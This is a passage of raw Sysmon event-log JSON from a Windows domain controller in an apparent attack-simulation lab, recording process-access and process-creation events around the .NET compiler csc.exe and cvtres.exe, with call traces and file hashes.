C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4573,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C6E0600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4574,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.287\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001049D90600}\r\nProcessId: 2464\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES722A.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC10DC3C9A4D154EDC95E43B4E5E8EDC8E.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-0313-5F25-0000-0010A0D50600}\r\nParentProcessId: 2852\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\seif41fl.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.287","ProcessGuid":"{A837DB8D-0313-5F25-0000-001049D90600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES722A.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC10DC3C9A4D154EDC95E43B4E5E8EDC8E.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-0313-5F25-0000-0010A0D50600}","ParentProcessId":"2852","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\seif41fl.cmdline\"","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4575,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-0313-5F25-0000-0010A0D50600}\r\nSourceProcessId: 2852\r\nSourceThreadId: 1616\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001049D90600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-0313-5F25-0000-0010A0D50600}","SourceProcessId":"2852","SourceThreadId":"1616","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001049D90600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4576,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001049D90600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001049D90600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4577,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4578,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4579,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.280","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4580,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.280\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 